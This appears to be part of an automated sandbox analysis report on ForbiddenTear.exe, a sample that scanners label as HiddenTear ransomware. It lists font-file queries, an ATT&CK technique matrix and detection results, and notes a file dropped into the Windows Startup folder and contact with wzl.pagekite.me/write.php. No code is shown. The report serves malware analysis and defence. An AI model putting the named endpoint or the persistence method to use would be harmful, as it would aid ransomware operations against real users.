    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation | Startup Items1 | Startup Items1 | Masquerading111 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder121 | Process Injection12 | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | LSASS Driver1 | Registry Run Keys / Startup Folder121 | Process Injection12 | Security Account Manager | Remote System Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | LSASS Driver1 | Obfuscated Files or Information1 | NTDS | System Information Discovery13 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

    Behavior Graph

    [Behavior graph image not reproduced. Data recoverable from the graph: Behavior Graph ID: 325968; Sample: ForbiddenTear.exe; Startdate: 02/12/2020; Architecture: WINDOWS; Score: 100.]
    Top-level signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 6 other signatures.
    Top-level processes started: ForbiddenTear.exe; cdd.dll; sihost.exe; 7 other processes.
    ForbiddenTear.exe: DNS/IP wzl.pagekite.me (95.216.167.199, ports 49709 and 80, HETZNER-ASDE, Germany); dropped file C:\Users\user\AppData\Roaming\...\servicesmc (PE32); signature "Drops PE files to the startup folder"; started cmd.exe.
    cmd.exe: started conhost.exe.

    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    ForbiddenTear.exe | 55% | Virustotal |
    ForbiddenTear.exe | 50% | ReversingLabs | ByteCode-MSIL.Ransomware.HiddenTear
    ForbiddenTear.exe | 100% | Avira | HEUR/AGEN.1121252
    ForbiddenTear.exe | 100% | Joe Sandbox ML |

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | 100% | Avira | HEUR/AGEN.1121252
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc | 50% | ReversingLabs | ByteCode-MSIL.Ransomware.HiddenTear

    Unpacked PE Files

    Source | Detection | Scanner | Label
    0.0.ForbiddenTear.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1121252
    0.2.ForbiddenTear.exe.370000.0.unpack | 100% | Avira | HEUR/AGEN.1121252

    Domains

    Source | Detection | Scanner | Label
    wzl.pagekite.me | 1% | Virustotal |

    URLs

    Source | Detection | Scanner | Label
    http://wzl.pagekite.me/write.php | 1% | Virustotal |
    http://wzl.pagekite.me/write.php | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/lt | 0% | Virustotal |
    http://www.jiyu-kobo.co.jp/lt | 0% | Avira URL Cloud | safe
    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
    http://wzl.pagekite.me/ | 1% | Virustotal |
    http://wzl.pagekite.me/ | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comd% | 0% | Avira URL Cloud | safe
    http://www.namazu.org/ | 0% | Avira URL Cloud | safe
    http://www.tiro.com | 0% | URL Reputation | safe
    http://www.tiro.com | 0% | URL Reputation | safe
    http://www.tiro.com | 0% | URL Reputation | safe
    http://www.goodfont.co.kr | 0% | URL Reputation | safe
    http://www.goodfont.co.kr | 0% | URL Reputation | safe
    http://www.goodfont.co.kr | 0% | URL Reputation | safe
    http://www.xfa.org/schema/xdc/1.0/ | 0% | Avira URL Cloud | safe
    http://www.sajatypeworks.com | 0% | URL Reputation | safe
    http://www.sajatypeworks.com | 0% | URL Reputation | safe
    http://www.sajatypeworks.com | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/m | 0% | Avira URL Cloud | safe
    http://www.typography.netD | 0% | URL Reputation | safe
    http://www.typography.netD | 0% | URL Reputation | safe
    http://www.typography.netD | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
    http://fontfabrik.com | 0% | URL Reputation | safe
    http://fontfabrik.com | 0% | URL Reputation | safe
    http://fontfabrik.com | 0% | URL Reputation | safe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/Acceptapplication/vnd.adobe.skybo | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/. | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/te | 0% | Avira URL Cloud | safe
    http://en.wq | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/jp/m | 0% | Avira URL Cloud | safe
    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
    http://www.sandoll.co.kr | 0% | URL Reputation | safe
    http://www.sandoll.co.kr | 0% | URL Reputation | safe
    http://www.sandoll.co.kr | 0% | URL Reputation | safe
    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
    http://www.flexerasoftware.com0 | 0% | Avira URL Cloud | safe
    http://www.sakkal.com | 0% | URL Reputation | safe
    http://www.sakkal.com | 0% | URL Reputation | safe
    http://www.sakkal.com | 0% | URL Reputation | safe
    http://www.fontbureau.com.TTF | 0% | URL Reputation | safe
    http://www.fontbureau.com.TTF | 0% | URL Reputation | safe
    http://www.fontbureau.com.TTF | 0% | URL Reputation | safe
    http://www.inform-fiction.org/ | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comalsd | 0% | Avira URL Cloud | safe
    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
    http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
    http://www.fontbureau.comF | 0% | URL Reputation | safe
    http://www.fontbureau.comF | 0% | URL Reputation | safe
    http://www.fontbureau.comF | 0% | URL Reputation | safe
    http://www.jiyu-kobo.co.jp/R | 0% | Avira URL Cloud | safe
    http://ocsp.thawte.com0 | 0% | URL Reputation | safe
    http://ocsp.thawte.com0 | 0% | URL Reputation | safe
    http://ocsp.thawte.com0 | 0% | URL Reputation | safe
    http://www.djvuzone.org/ | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/I | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comcomm | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comtv | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/vam | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comI.TTF. | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comL.TTF | 0% | Avira URL Cloud | safe
    http://www.fontbureau.comcomd% | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
    http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
    http://www.fontbureau.coma | 0% | URL Reputation | safe
    http://www.fontbureau.coma | 0% | URL Reputation | safe
    http://www.fontbureau.coma | 0% | URL Reputation | safe
    http://www.fontbureau.comd | 0% | URL Reputation | safe
    http://www.fontbureau.comd | 0% | URL Reputation | safe
    http://www.fontbureau.comd | 0% | URL Reputation | safe
    http://www.websitetest.com/ | 0% | Avira URL Cloud | safe
    http://www.carterandcone.coml | 0% | URL Reputation | safe
    http://www.carterandcone.coml | 0% | URL Reputation | safe
    http://www.carterandcone.coml | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn. | 0% | Avira URL Cloud | safe
    http://www.adrift.org.uk/) | 0% | Avira URL Cloud | safe
    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
    http://www.jiyu-kobo.co.jp/v | 0% | Avira URL Cloud | safe
    http://www.jiyu-kobo.co.jp/p | 0% | URL Reputation | safe
    http://www.jiyu-kobo.co.jp/p | 0% | URL Reputation | safe

    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    wzl.pagekite.me | 95.216.167.199 | true | false | | unknown

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://wzl.pagekite.me/write.php | false | 1%, Virustotal; Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.jiyu-kobo.co.jp/lt | ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
    http://www.fontbureau.com/designersG | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://lists.gnupg.org/pipermail/gnupg-devel/1999-September/016052.html | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.com/designers/? | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://www.founder.com.cn/cn/bThe | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://wzl.pagekite.me/ | ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
    http://www.fontbureau.com/designers? | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    https://pagekite.net/ | ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/soap/envelope/ | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.com/designers/cabarga.htmlhtX | ForbiddenTear.exe, 00000000.00000003.216196286.0000000005716000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.comd% | ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
    http://www.namazu.org/ | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.tiro.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.fontbureau.com/designers | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/soap/encoding/:root | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.goodfont.co.kr | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.xfa.org/schema/xdc/1.0/ | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    https://cex.io | ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | false | | high
    http://www.sajatypeworks.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.galapagosdesign.com/m | ForbiddenTear.exe, 00000000.00000003.217291955.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.typography.netD | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.founder.com.cn/cn/cThe | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.galapagosdesign.com/staff/dennis.htm | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://fontfabrik.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://crl.thawte.com/ThawteTimestampingCA.crl0 | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/Acceptapplication/vnd.adobe.skybo | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
    http://www.geocities.com/nevilo/mod.htm: | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/. | ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
